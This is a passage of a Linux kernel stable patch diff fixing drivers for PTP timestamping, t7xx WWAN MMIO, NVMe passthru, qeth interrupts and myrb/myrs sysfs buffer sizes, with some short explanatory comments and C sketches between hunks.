+ 	struct hwtstamp_config config;
+ 	int txcfg = 0, rxcfg = 0;
+ 	int pkt_ts_enable;
++	int tx_mod;
+ 
+ 	if (copy_from_user(&config, ifr->ifr_data, sizeof(config)))
+ 		return -EFAULT;
+@@ -2237,9 +2238,14 @@ static int lan8814_hwtstamp(struct mii_timestamper *mii_ts, struct ifreq *ifr)
+ 	lanphy_write_page_reg(ptp_priv->phydev, 5, PTP_RX_TIMESTAMP_EN, pkt_ts_enable);
+ 	lanphy_write_page_reg(ptp_priv->phydev, 5, PTP_TX_TIMESTAMP_EN, pkt_ts_enable);
+ 
+-	if (ptp_priv->hwts_tx_type == HWTSTAMP_TX_ONESTEP_SYNC)
++	tx_mod = lanphy_read_page_reg(ptp_priv->phydev, 5, PTP_TX_MOD);
++	if (ptp_priv->hwts_tx_type == HWTSTAMP_TX_ONESTEP_SYNC) {
+ 		lanphy_write_page_reg(ptp_priv->phydev, 5, PTP_TX_MOD,
+-				      PTP_TX_MOD_TX_PTP_SYNC_TS_INSERT_);
++				      tx_mod | PTP_TX_MOD_TX_PTP_SYNC_TS_INSERT_);
++	} else if (ptp_priv->hwts_tx_type == HWTSTAMP_TX_ON) {
++		lanphy_write_page_reg(ptp_priv->phydev, 5, PTP_TX_MOD,
++				      tx_mod & ~PTP_TX_MOD_TX_PTP_SYNC_TS_INSERT_);
++	}
+ 
+ 	if (config.rx_filter != HWTSTAMP_FILTER_NONE)
+ 		lan8814_config_ts_intr(ptp_priv->phydev, true);
+@@ -2297,7 +2303,7 @@ static void lan8814_txtstamp(struct mii_timestamper *mii_ts,
+ 	}
+ }
+ 
+-static void lan8814_get_sig_rx(struct sk_buff *skb, u16 *sig)
++static bool lan8814_get_sig_rx(struct sk_buff *skb, u16 *sig)
+ {
+ 	struct ptp_header *ptp_header;
+ 	u32 type;
+@@ -2307,7 +2313,11 @@ static void lan8814_get_sig_rx(struct sk_buff *skb, u16 *sig)
+ 	ptp_header = ptp_parse_header(skb, type);
+ 	skb_pull_inline(skb, ETH_HLEN);
+ 
++	if (!ptp_header)
++		return false;
++
+ 	*sig = (__force u16)(ntohs(ptp_header->sequence_id));
++	return true;
+ }
+ 
+ static bool lan8814_match_rx_ts(struct kszphy_ptp_priv *ptp_priv,
+@@ -2319,7 +2329,8 @@ static bool lan8814_match_rx_ts(struct kszphy_ptp_priv *ptp_priv,
+ 	bool ret = false;
+ 	u16 skb_sig;
+ 
+-	lan8814_get_sig_rx(skb, &skb_sig);
++	if (!lan8814_get_sig_rx(skb, &skb_sig))
++		return ret;
+ 
+ 	/* Iterate over all RX timestamps and match it with the received skbs */
+ 	spin_lock_irqsave(&ptp_priv->rx_ts_lock, flags);
+@@ -2599,7 +2610,7 @@ static int lan8814_ptpci_adjfine(struct ptp_clock_info *ptpci, long scaled_ppm)
+ 	return 0;
+ }
+ 
+-static void lan8814_get_sig_tx(struct sk_buff *skb, u16 *sig)
++static bool lan8814_get_sig_tx(struct sk_buff *skb, u16 *sig)
+ {
+ 	struct ptp_header *ptp_header;
+ 	u32 type;
+@@ -2607,7 +2618,11 @@ static void lan8814_get_sig_tx(struct sk_buff *skb, u16 *sig)
+ 	type = ptp_classify_raw(skb);
+ 	ptp_header = ptp_parse_header(skb, type);
+ 
++	if (!ptp_header)
++		return false;
++
+ 	*sig = (__force u16)(ntohs(ptp_header->sequence_id));
++	return true;
+ }
+ 
+ static void lan8814_dequeue_tx_skb(struct kszphy_ptp_priv *ptp_priv)
+@@ -2625,7 +2640,8 @@ static void lan8814_dequeue_tx_skb(struct kszphy_ptp_priv *ptp_priv)
+ 
+ 	spin_lock_irqsave(&ptp_priv->tx_queue.lock, flags);
+ 	skb_queue_walk_safe(&ptp_priv->tx_queue, skb, skb_tmp) {
+-		lan8814_get_sig_tx(skb, &skb_sig);
++		if (!lan8814_get_sig_tx(skb, &skb_sig))
++			continue;
+ 
+ 		if (memcmp(&skb_sig, &seq_id, sizeof(seq_id)))
+ 			continue;
+@@ -2669,7 +2685,8 @@ static bool lan8814_match_skb(struct kszphy_ptp_priv *ptp_priv,
+ 
+ 	spin_lock_irqsave(&ptp_priv->rx_queue.lock, flags);
+ 	skb_queue_walk_safe(&ptp_priv->rx_queue, skb, skb_tmp) {
+-		lan8814_get_sig_rx(skb, &skb_sig);
++		if (!lan8814_get_sig_rx(skb, &skb_sig))
++			continue;
+ 
+ 		if (memcmp(&skb_sig, &rx_ts->seq_id, sizeof(rx_ts->seq_id)))
+ 			continue;
+diff --git a/drivers/net/usb/asix_devices.c b/drivers/net/usb/asix_devices.c
+index 6eacbf17f1c0c..34cd568b27f19 100644
+--- a/drivers/net/usb/asix_devices.c
++++ b/drivers/net/usb/asix_devices.c
+@@ -714,7 +714,7 @@ static int ax88772_init_phy(struct usbnet *dev)
+ 	}
+ 
+ 	phy_suspend(priv->phydev);
+-	priv->phydev->mac_managed_pm = 1;
++	priv->phydev->mac_managed_pm = true;
+ 
+ 	phy_attached_info(priv->phydev);
+ 
+@@ -734,7 +734,7 @@ static int ax88772_init_phy(struct usbnet *dev)
+ 		return -ENODEV;
+ 	}
+ 
+-	priv->phydev_int->mac_managed_pm = 1;
++	priv->phydev_int->mac_managed_pm = true;
+ 	phy_suspend(priv->phydev_int);
+ 
+ 	return 0;
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index d837c18874161..e0e9b4c53cb02 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -1273,6 +1273,8 @@ static void ax88179_get_mac_addr(struct usbnet *dev)
+ 
+ 	if (is_valid_ether_addr(mac)) {
+ 		eth_hw_addr_set(dev->net, mac);
++		if (!is_local_ether_addr(mac))
++			dev->net->addr_assign_type = NET_ADDR_PERM;
+ 	} else {
+ 		netdev_info(dev->net, "invalid MAC address, using random\n");
+ 		eth_hw_addr_random(dev->net);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rfi.c b/drivers/net/wireless/intel/iwlwifi/mvm/rfi.c
+index bb77bc9aa8218..fb2408c0551d2 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rfi.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rfi.c
+@@ -122,14 +122,18 @@ struct iwl_rfi_freq_table_resp_cmd *iwl_rfi_get_freq_table(struct iwl_mvm *mvm)
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+-	if (WARN_ON_ONCE(iwl_rx_packet_payload_len(cmd.resp_pkt) != resp_size))
++	if (WARN_ON_ONCE(iwl_rx_packet_payload_len(cmd.resp_pkt) !=
++			 resp_size)) {
++		iwl_free_resp(&cmd);
+ 		return ERR_PTR(-EIO);
++	}
+ 
+ 	resp = kmemdup(cmd.resp_pkt->data, resp_size, GFP_KERNEL);
++	iwl_free_resp(&cmd);
++
+ 	if (!resp)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	iwl_free_resp(&cmd);
+ 	return resp;
+ }
+ 
+diff --git a/drivers/net/wwan/t7xx/t7xx_cldma.c b/drivers/net/wwan/t7xx/t7xx_cldma.c
+index 9f43f256db1d0..f0a4783baf1f3 100644
+--- a/drivers/net/wwan/t7xx/t7xx_cldma.c
++++ b/drivers/net/wwan/t7xx/t7xx_cldma.c
+@@ -106,7 +106,7 @@ bool t7xx_cldma_tx_addr_is_set(struct t7xx_cldma_hw *hw_info, unsigned int qno)
+ {
+ 	u32 offset = REG_CLDMA_UL_START_ADDRL_0 + qno * ADDR_SIZE;
+ 
+-	return ioread64(hw_info->ap_pdn_base + offset);
++	return ioread64_lo_hi(hw_info->ap_pdn_base + offset);
+ }
+ 
+ void t7xx_cldma_hw_set_start_addr(struct t7xx_cldma_hw *hw_info, unsigned int qno, u64 address,
+@@ -117,7 +117,7 @@ void t7xx_cldma_hw_set_start_addr(struct t7xx_cldma_hw *hw_info, unsigned int qn
+ 
+ 	reg = tx_rx == MTK_RX ? hw_info->ap_ao_base + REG_CLDMA_DL_START_ADDRL_0 :
+ 				hw_info->ap_pdn_base + REG_CLDMA_UL_START_ADDRL_0;
+-	iowrite64(address, reg + offset);
++	iowrite64_lo_hi(address, reg + offset);
+ }
+ 
+ void t7xx_cldma_hw_resume_queue(struct t7xx_cldma_hw *hw_info, unsigned int qno,
+diff --git a/drivers/net/wwan/t7xx/t7xx_hif_cldma.c b/drivers/net/wwan/t7xx/t7xx_hif_cldma.c
+index 6ff30cb8eb16f..5d6032ceb9e51 100644
+--- a/drivers/net/wwan/t7xx/t7xx_hif_cldma.c
++++ b/drivers/net/wwan/t7xx/t7xx_hif_cldma.c
+@@ -139,8 +139,9 @@ static int t7xx_cldma_gpd_rx_from_q(struct cldma_queue *queue, int budget, bool
+ 				return -ENODEV;
+ 			}
+ 
+-			gpd_addr = ioread64(hw_info->ap_pdn_base + REG_CLDMA_DL_CURRENT_ADDRL_0 +
+-					    queue->index * sizeof(u64));
++			gpd_addr = ioread64_lo_hi(hw_info->ap_pdn_base +
++						  REG_CLDMA_DL_CURRENT_ADDRL_0 +
++						  queue->index * sizeof(u64));
+ 			if (req->gpd_addr == gpd_addr || hwo_polling_count++ >= 100)
+ 				return 0;
+ 
+@@ -318,8 +319,8 @@ static void t7xx_cldma_txq_empty_hndl(struct cldma_queue *queue)
+ 		struct t7xx_cldma_hw *hw_info = &md_ctrl->hw_info;
+ 
+ 		/* Check current processing TGPD, 64-bit address is in a table by Q index */
+-		ul_curr_addr = ioread64(hw_info->ap_pdn_base + REG_CLDMA_UL_CURRENT_ADDRL_0 +
+-					queue->index * sizeof(u64));
++		ul_curr_addr = ioread64_lo_hi(hw_info->ap_pdn_base + REG_CLDMA_UL_CURRENT_ADDRL_0 +
++					      queue->index * sizeof(u64));
+ 		if (req->gpd_addr != ul_curr_addr) {
+ 			spin_unlock_irqrestore(&md_ctrl->cldma_lock, flags);
+ 			dev_err(md_ctrl->dev, "CLDMA%d queue %d is not empty\n",
+diff --git a/drivers/net/wwan/t7xx/t7xx_pcie_mac.c b/drivers/net/wwan/t7xx/t7xx_pcie_mac.c
+index 76da4c15e3de1..f071ec7ff23d5 100644
+--- a/drivers/net/wwan/t7xx/t7xx_pcie_mac.c
++++ b/drivers/net/wwan/t7xx/t7xx_pcie_mac.c
+@@ -75,7 +75,7 @@ static void t7xx_pcie_mac_atr_tables_dis(void __iomem *pbase, enum t7xx_atr_src_
+ 	for (i = 0; i < ATR_TABLE_NUM_PER_ATR; i++) {
+ 		offset = ATR_PORT_OFFSET * port + ATR_TABLE_OFFSET * i;
+ 		reg = pbase + ATR_PCIE_WIN0_T0_ATR_PARAM_SRC_ADDR + offset;
+-		iowrite64(0, reg);
++		iowrite64_lo_hi(0, reg);
+ 	}
+ }
+ 
+@@ -112,17 +112,17 @@ static int t7xx_pcie_mac_atr_cfg(struct t7xx_pci_dev *t7xx_dev, struct t7xx_atr_
+ 
+ 	reg = pbase + ATR_PCIE_WIN0_T0_TRSL_ADDR + offset;
+ 	value = cfg->trsl_addr & ATR_PCIE_WIN0_ADDR_ALGMT;
+-	iowrite64(value, reg);
++	iowrite64_lo_hi(value, reg);
+ 
+ 	reg = pbase + ATR_PCIE_WIN0_T0_TRSL_PARAM + offset;
+ 	iowrite32(cfg->trsl_id, reg);
+ 
+ 	reg = pbase + ATR_PCIE_WIN0_T0_ATR_PARAM_SRC_ADDR + offset;
+ 	value = (cfg->src_addr & ATR_PCIE_WIN0_ADDR_ALGMT) | (atr_size << 1) | BIT(0);
+-	iowrite64(value, reg);
++	iowrite64_lo_hi(value, reg);
+ 
+ 	/* Ensure ATR is set */
+-	ioread64(reg);
++	ioread64_lo_hi(reg);
+ 	return 0;
+ }
+ 
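
Every t7xx change in this group swaps ioread64()/iowrite64() for the _lo_hi variants, which split the 64-bit register access into two explicit 32-bit operations, low word first. That is the safe choice when either the CPU or the PCIe endpoint does not handle a native 64-bit MMIO transaction. A standalone sketch of what the lo-hi helpers amount to (this mirrors the io-64-nonatomic-lo-hi semantics, not the kernel implementation itself):

    #include <stdint.h>

    /* Assumes a little-endian register pair: reg[0] holds the low 32
     * bits, reg[1] the high 32 bits. */
    static uint64_t read64_lo_hi(const volatile uint32_t *reg)
    {
            uint64_t lo = reg[0];   /* low word first */
            uint64_t hi = reg[1];

            return lo | (hi << 32);
    }

    static void write64_lo_hi(volatile uint32_t *reg, uint64_t val)
    {
            reg[0] = (uint32_t)val;         /* low word first */
            reg[1] = (uint32_t)(val >> 32); /* then the high word */
    }
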
+diff --git a/drivers/net/xen-netfront.c b/drivers/net/xen-netfront.c
+index dc404e05970cd..95b5ab4b964e2 100644
+--- a/drivers/net/xen-netfront.c
++++ b/drivers/net/xen-netfront.c
+@@ -285,6 +285,7 @@ static struct sk_buff *xennet_alloc_one_rx_buffer(struct netfront_queue *queue)
+ 		return NULL;
+ 	}
+ 	skb_add_rx_frag(skb, 0, page, 0, 0, PAGE_SIZE);
++	skb_mark_for_recycle(skb);
+ 
+ 	/* Align ip header to a 16 bytes boundary */
+ 	skb_reserve(skb, NET_IP_ALIGN);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index d7516e99275b6..20160683e8685 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1151,7 +1151,7 @@ static u32 nvme_passthru_start(struct nvme_ctrl *ctrl, struct nvme_ns *ns,
+ 	return effects;
+ }
+ 
+-void nvme_passthru_end(struct nvme_ctrl *ctrl, u32 effects,
++void nvme_passthru_end(struct nvme_ctrl *ctrl, struct nvme_ns *ns, u32 effects,
+ 		       struct nvme_command *cmd, int status)
+ {
+ 	if (effects & NVME_CMD_EFFECTS_CSE_MASK) {
+@@ -1167,6 +1167,8 @@ void nvme_passthru_end(struct nvme_ctrl *ctrl, u32 effects,
+ 		nvme_queue_scan(ctrl);
+ 		flush_work(&ctrl->scan_work);
+ 	}
++	if (ns)
++		return;
+ 
+ 	switch (cmd->common.opcode) {
+ 	case nvme_admin_set_features:
+diff --git a/drivers/nvme/host/ioctl.c b/drivers/nvme/host/ioctl.c
+index 91e6d03475798..b3e322e4ade38 100644
+--- a/drivers/nvme/host/ioctl.c
++++ b/drivers/nvme/host/ioctl.c
+@@ -147,6 +147,7 @@ static int nvme_submit_user_cmd(struct request_queue *q,
+ 		unsigned bufflen, void __user *meta_buffer, unsigned meta_len,
+ 		u32 meta_seed, u64 *result, unsigned timeout, bool vec)
+ {
++	struct nvme_ns *ns = q->queuedata;
+ 	struct nvme_ctrl *ctrl;
+ 	struct request *req;
+ 	void *meta = NULL;
+@@ -181,7 +182,7 @@ static int nvme_submit_user_cmd(struct request_queue *q,
+ 	blk_mq_free_request(req);
+ 
+ 	if (effects)
+-		nvme_passthru_end(ctrl, effects, cmd, ret);
++		nvme_passthru_end(ctrl, ns, effects, cmd, ret);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index a892d679e3389..8e28d2de45c0e 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -1063,7 +1063,7 @@ static inline void nvme_auth_free(struct nvme_ctrl *ctrl) {};
+ u32 nvme_command_effects(struct nvme_ctrl *ctrl, struct nvme_ns *ns,
+ 			 u8 opcode);
+ int nvme_execute_passthru_rq(struct request *rq, u32 *effects);
+-void nvme_passthru_end(struct nvme_ctrl *ctrl, u32 effects,
++void nvme_passthru_end(struct nvme_ctrl *ctrl, struct nvme_ns *ns, u32 effects,
+ 		       struct nvme_command *cmd, int status);
+ struct nvme_ctrl *nvme_ctrl_from_file(struct file *file);
+ struct nvme_ns *nvme_find_get_ns(struct nvme_ctrl *ctrl, unsigned nsid);
+diff --git a/drivers/nvme/target/passthru.c b/drivers/nvme/target/passthru.c
+index adc0958755d66..a0a292d49588c 100644
+--- a/drivers/nvme/target/passthru.c
++++ b/drivers/nvme/target/passthru.c
+@@ -216,6 +216,7 @@ static void nvmet_passthru_execute_cmd_work(struct work_struct *w)
+ 	struct nvmet_req *req = container_of(w, struct nvmet_req, p.work);
+ 	struct request *rq = req->p.rq;
+ 	struct nvme_ctrl *ctrl = nvme_req(rq)->ctrl;
++	struct nvme_ns *ns = rq->q->queuedata;
+ 	u32 effects;
+ 	int status;
+ 
+@@ -242,7 +243,7 @@ static void nvmet_passthru_execute_cmd_work(struct work_struct *w)
+ 	blk_mq_free_request(rq);
+ 
+ 	if (effects)
+-		nvme_passthru_end(ctrl, effects, req->cmd, status);
++		nvme_passthru_end(ctrl, ns, effects, req->cmd, status);
+ }
+ 
+ static enum rq_end_io_ret nvmet_passthru_req_done(struct request *rq,
+diff --git a/drivers/of/dynamic.c b/drivers/of/dynamic.c
+index 9bb9fe0fad07c..e2a9651014c6e 100644
+--- a/drivers/of/dynamic.c
++++ b/drivers/of/dynamic.c
+@@ -9,6 +9,7 @@
+ 
+ #define pr_fmt(fmt)	"OF: " fmt
+ 
++#include <linux/device.h>
+ #include <linux/of.h>
+ #include <linux/spinlock.h>
+ #include <linux/slab.h>
+@@ -679,6 +680,17 @@ void of_changeset_destroy(struct of_changeset *ocs)
+ {
+ 	struct of_changeset_entry *ce, *cen;
+ 
++	/*
++	 * When a device is deleted, the device links to/from it are also queued
++	 * for deletion. Until these device links are freed, the devices
++	 * themselves aren't freed. If the device being deleted is due to an
++	 * overlay change, this device might be holding a reference to a device
++	 * node that will be freed. So, wait until all already pending device
++	 * links are deleted before freeing a device node. This ensures we don't
++	 * free any device node that has a non-zero reference count.
++	 */
++	device_link_wait_removal();
++
+ 	list_for_each_entry_safe_reverse(ce, cen, &ocs->entries, node)
+ 		__of_changeset_entry_destroy(ce);
+ }
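
The comment in the hunk carries the reasoning: device-link removal is deferred to a workqueue, so a changeset teardown that frees device nodes must first drain that queue via device_link_wait_removal() (declared in the include/linux/device.h hunk further down). The general shape, flushing pending asynchronous releases before freeing the objects they reference, looks like this sketch (all names hypothetical):

    #include <linux/list.h>
    #include <linux/workqueue.h>

    struct demo_entry { struct list_head node; };
    struct demo_set { struct list_head entries; };

    extern struct workqueue_struct *demo_release_wq;
    extern void demo_entry_free(struct demo_entry *e);

    /* Queued release work may still reference entries on this list, so
     * drain the queue before anything is freed. */
    static void demo_set_destroy(struct demo_set *set)
    {
            struct demo_entry *e, *tmp;

            flush_workqueue(demo_release_wq);

            list_for_each_entry_safe_reverse(e, tmp, &set->entries, node)
                    demo_entry_free(e);
    }
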
+diff --git a/drivers/perf/riscv_pmu.c b/drivers/perf/riscv_pmu.c
+index 56897d4d4fd3e..2d5cf135e8a1d 100644
+--- a/drivers/perf/riscv_pmu.c
++++ b/drivers/perf/riscv_pmu.c
+@@ -246,6 +246,10 @@ static int riscv_pmu_event_init(struct perf_event *event)
+ 	u64 event_config = 0;
+ 	uint64_t cmask;
+ 
++	/* driver does not support branch stack sampling */
++	if (has_branch_stack(event))
++		return -EOPNOTSUPP;
++
+ 	hwc->flags = 0;
+ 	mapped_event = rvpmu->event_map(event, &event_config);
+ 	if (mapped_event < 0) {
+diff --git a/drivers/s390/net/qeth_core_main.c b/drivers/s390/net/qeth_core_main.c
+index ae4b6d24bc902..1e6340e2c2588 100644
+--- a/drivers/s390/net/qeth_core_main.c
++++ b/drivers/s390/net/qeth_core_main.c
+@@ -1179,6 +1179,20 @@ static int qeth_check_irb_error(struct qeth_card *card, struct ccw_device *cdev,
+ 	}
+ }
+ 
++/**
++ * qeth_irq() - qeth interrupt handler
++ * @cdev: ccw device
++ * @intparm: expected to be a pointer to the active iob
++ * @irb: Interruption Response Block
++ *
++ * In the good path, the corresponding qeth channel is locked with the
++ * last used iob as active_cmd. But this function is also called for
++ * error interrupts.
++ *
++ * Caller ensures that:
++ * interrupts are disabled and the ccw device lock is held.
++ *
++ */
+ static void qeth_irq(struct ccw_device *cdev, unsigned long intparm,
+ 		struct irb *irb)
+ {
+@@ -1220,11 +1234,10 @@ static void qeth_irq(struct ccw_device *cdev, unsigned long intparm,
+ 		iob = (struct qeth_cmd_buffer *) (addr_t)intparm;
+ 	}
+ 
+-	qeth_unlock_channel(card, channel);
+-
+ 	rc = qeth_check_irb_error(card, cdev, irb);
+ 	if (rc) {
+ 		/* IO was terminated, free its resources. */
++		qeth_unlock_channel(card, channel);
+ 		if (iob)
+ 			qeth_cancel_cmd(iob, rc);
+ 		return;
+@@ -1268,6 +1281,7 @@ static void qeth_irq(struct ccw_device *cdev, unsigned long intparm,
+ 		rc = qeth_get_problem(card, cdev, irb);
+ 		if (rc) {
+ 			card->read_or_write_problem = 1;
++			qeth_unlock_channel(card, channel);
+ 			if (iob)
+ 				qeth_cancel_cmd(iob, rc);
+ 			qeth_clear_ipacmd_list(card);
+@@ -1276,6 +1290,26 @@ static void qeth_irq(struct ccw_device *cdev, unsigned long intparm,
+ 		}
+ 	}
+ 
++	if (scsw_cmd_is_valid_cc(&irb->scsw) && irb->scsw.cmd.cc == 1 && iob) {
++		/* channel command hasn't started: retry.
++		 * active_cmd is still set to last iob
++		 */
++		QETH_CARD_TEXT(card, 2, "irqcc1");
++		rc = ccw_device_start_timeout(cdev, __ccw_from_cmd(iob),
++					      (addr_t)iob, 0, 0, iob->timeout);
++		if (rc) {
++			QETH_DBF_MESSAGE(2,
++					 "ccw retry on %x failed, rc = %i\n",
++					 CARD_DEVID(card), rc);
++			QETH_CARD_TEXT_(card, 2, " err%d", rc);
++			qeth_unlock_channel(card, channel);
++			qeth_cancel_cmd(iob, rc);
++		}
++		return;
++	}
++
++	qeth_unlock_channel(card, channel);
++
+ 	if (iob) {
+ 		/* sanity check: */
+ 		if (irb->scsw.cmd.count > iob->length) {
+diff --git a/drivers/scsi/myrb.c b/drivers/scsi/myrb.c
+index e885c1dbf61f9..e2f1b186efd00 100644
+--- a/drivers/scsi/myrb.c
++++ b/drivers/scsi/myrb.c
+@@ -1775,9 +1775,9 @@ static ssize_t raid_state_show(struct device *dev,
+ 
+ 		name = myrb_devstate_name(ldev_info->state);
+ 		if (name)
+-			ret = snprintf(buf, 32, "%s\n", name);
++			ret = snprintf(buf, 64, "%s\n", name);
+ 		else
+-			ret = snprintf(buf, 32, "Invalid (%02X)\n",
++			ret = snprintf(buf, 64, "Invalid (%02X)\n",
+ 				       ldev_info->state);
+ 	} else {
+ 		struct myrb_pdev_state *pdev_info = sdev->hostdata;
+@@ -1796,9 +1796,9 @@ static ssize_t raid_state_show(struct device *dev,
+ 		else
+ 			name = myrb_devstate_name(pdev_info->state);
+ 		if (name)
+-			ret = snprintf(buf, 32, "%s\n", name);
++			ret = snprintf(buf, 64, "%s\n", name);
+ 		else
+-			ret = snprintf(buf, 32, "Invalid (%02X)\n",
++			ret = snprintf(buf, 64, "Invalid (%02X)\n",
+ 				       pdev_info->state);
+ 	}
+ 	return ret;
+@@ -1886,11 +1886,11 @@ static ssize_t raid_level_show(struct device *dev,
+ 
+ 		name = myrb_raidlevel_name(ldev_info->raid_level);
+ 		if (!name)
+-			return snprintf(buf, 32, "Invalid (%02X)\n",
++			return snprintf(buf, 64, "Invalid (%02X)\n",
+ 					ldev_info->state);
+-		return snprintf(buf, 32, "%s\n", name);
++		return snprintf(buf, 64, "%s\n", name);
+ 	}
+-	return snprintf(buf, 32, "Physical Drive\n");
++	return snprintf(buf, 64, "Physical Drive\n");
+ }
+ static DEVICE_ATTR_RO(raid_level);
+ 
+@@ -1903,15 +1903,15 @@ static ssize_t rebuild_show(struct device *dev,
+ 	unsigned char status;
+ 
+ 	if (sdev->channel < myrb_logical_channel(sdev->host))
+-		return snprintf(buf, 32, "physical device - not rebuilding\n");
++		return snprintf(buf, 64, "physical device - not rebuilding\n");
+ 
+ 	status = myrb_get_rbld_progress(cb, &rbld_buf);
+ 
+ 	if (rbld_buf.ldev_num != sdev->id ||
+ 	    status != MYRB_STATUS_SUCCESS)
+-		return snprintf(buf, 32, "not rebuilding\n");
++		return snprintf(buf, 64, "not rebuilding\n");
+ 
+-	return snprintf(buf, 32, "rebuilding block %u of %u\n",
++	return snprintf(buf, 64, "rebuilding block %u of %u\n",
+ 			rbld_buf.ldev_size - rbld_buf.blocks_left,
+ 			rbld_buf.ldev_size);
+ }
+diff --git a/drivers/scsi/myrs.c b/drivers/scsi/myrs.c
+index 7eb8c39da3663..95e7c00cb7e54 100644
+--- a/drivers/scsi/myrs.c
++++ b/drivers/scsi/myrs.c
+@@ -947,9 +947,9 @@ static ssize_t raid_state_show(struct device *dev,
+ 
+ 		name = myrs_devstate_name(ldev_info->dev_state);
+ 		if (name)
+-			ret = snprintf(buf, 32, "%s\n", name);
++			ret = snprintf(buf, 64, "%s\n", name);
+ 		else
+-			ret = snprintf(buf, 32, "Invalid (%02X)\n",
++			ret = snprintf(buf, 64, "Invalid (%02X)\n",
+ 				       ldev_info->dev_state);
+ 	} else {
+ 		struct myrs_pdev_info *pdev_info;
+@@ -958,9 +958,9 @@ static ssize_t raid_state_show(struct device *dev,
+ 		pdev_info = sdev->hostdata;
+ 		name = myrs_devstate_name(pdev_info->dev_state);
+ 		if (name)
+-			ret = snprintf(buf, 32, "%s\n", name);
++			ret = snprintf(buf, 64, "%s\n", name);
+ 		else
+-			ret = snprintf(buf, 32, "Invalid (%02X)\n",
++			ret = snprintf(buf, 64, "Invalid (%02X)\n",
+ 				       pdev_info->dev_state);
+ 	}
+ 	return ret;
+@@ -1066,13 +1066,13 @@ static ssize_t raid_level_show(struct device *dev,
+ 		ldev_info = sdev->hostdata;
+ 		name = myrs_raid_level_name(ldev_info->raid_level);
+ 		if (!name)
+-			return snprintf(buf, 32, "Invalid (%02X)\n",
++			return snprintf(buf, 64, "Invalid (%02X)\n",
+ 					ldev_info->dev_state);
+ 
+ 	} else
+ 		name = myrs_raid_level_name(MYRS_RAID_PHYSICAL);
+ 
+-	return snprintf(buf, 32, "%s\n", name);
++	return snprintf(buf, 64, "%s\n", name);
+ }
+ static DEVICE_ATTR_RO(raid_level);
+ 
+@@ -1086,7 +1086,7 @@ static ssize_t rebuild_show(struct device *dev,
+ 	unsigned char status;
+ 
+ 	if (sdev->channel < cs->ctlr_info->physchan_present)
+-		return snprintf(buf, 32, "physical device - not rebuilding\n");
++		return snprintf(buf, 64, "physical device - not rebuilding\n");
+ 
+ 	ldev_info = sdev->hostdata;
+ 	ldev_num = ldev_info->ldev_num;
+@@ -1098,11 +1098,11 @@ static ssize_t rebuild_show(struct device *dev,
+ 		return -EIO;
+ 	}
+ 	if (ldev_info->rbld_active) {
+-		return snprintf(buf, 32, "rebuilding block %zu of %zu\n",
++		return snprintf(buf, 64, "rebuilding block %zu of %zu\n",
+ 				(size_t)ldev_info->rbld_lba,
+ 				(size_t)ldev_info->cfg_devsize);
+ 	} else
+-		return snprintf(buf, 32, "not rebuilding\n");
++		return snprintf(buf, 64, "not rebuilding\n");
+ }
+ 
+ static ssize_t rebuild_store(struct device *dev,
+@@ -1190,7 +1190,7 @@ static ssize_t consistency_check_show(struct device *dev,
+ 	unsigned short ldev_num;
+ 
+ 	if (sdev->channel < cs->ctlr_info->physchan_present)
+-		return snprintf(buf, 32, "physical device - not checking\n");
++		return snprintf(buf, 64, "physical device - not checking\n");
+ 
+ 	ldev_info = sdev->hostdata;
+ 	if (!ldev_info)
+@@ -1198,11 +1198,11 @@ static ssize_t consistency_check_show(struct device *dev,
+ 	ldev_num = ldev_info->ldev_num;
+ 	myrs_get_ldev_info(cs, ldev_num, ldev_info);
+ 	if (ldev_info->cc_active)
+-		return snprintf(buf, 32, "checking block %zu of %zu\n",
++		return snprintf(buf, 64, "checking block %zu of %zu\n",
+ 				(size_t)ldev_info->cc_lba,
+ 				(size_t)ldev_info->cfg_devsize);
+ 	else
+-		return snprintf(buf, 32, "not checking\n");
++		return snprintf(buf, 64, "not checking\n");
+ }
+ 
+ static ssize_t consistency_check_store(struct device *dev,
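
All of the myrb/myrs changes above are the same one-character fix: these are sysfs show() callbacks, whose buf is a full PAGE_SIZE, so the hard-coded 32-byte cap only truncated the longer messages. snprintf() never overruns; it truncates and reports the untruncated length, as a small userspace check shows:

    #include <stdio.h>

    int main(void)
    {
            char buf[64];
            int n;

            /* 32-byte cap: the string is cut off after 31 characters, and
             * the return value (39) is the length that would have been
             * written without the cap. */
            n = snprintf(buf, 32, "rebuilding block %u of %u",
                         123456789u, 987654321u);
            printf("ret=%d str=[%s]\n", n, buf);

            /* 64-byte cap: the same message fits intact. */
            n = snprintf(buf, 64, "rebuilding block %u of %u",
                         123456789u, 987654321u);
            printf("ret=%d str=[%s]\n", n, buf);
            return 0;
    }

Current kernels would typically use sysfs_emit(), which bakes in the PAGE_SIZE bound; a stable backport keeps the minimal diff instead.
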
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index c793bca882236..f32236c3f81c6 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -3636,7 +3636,7 @@ static int sd_probe(struct device *dev)
+ 
+ 	error = device_add_disk(dev, gd, NULL);
+ 	if (error) {
+-		put_device(&sdkp->disk_dev);
++		device_unregister(&sdkp->disk_dev);
+ 		put_disk(gd);
+ 		goto out;
+ 	}
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index e4522e86e984e..8d15959004ad2 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -2889,12 +2889,9 @@ static void
+ nfsd4_cb_recall_any_release(struct nfsd4_callback *cb)
+ {
+ 	struct nfs4_client *clp = cb->cb_clp;
+-	struct nfsd_net *nn = net_generic(clp->net, nfsd_net_id);
+ 
+-	spin_lock(&nn->client_lock);
+ 	clear_bit(NFSD4_CLIENT_CB_RECALL_ANY, &clp->cl_flags);
+-	put_client_renew_locked(clp);
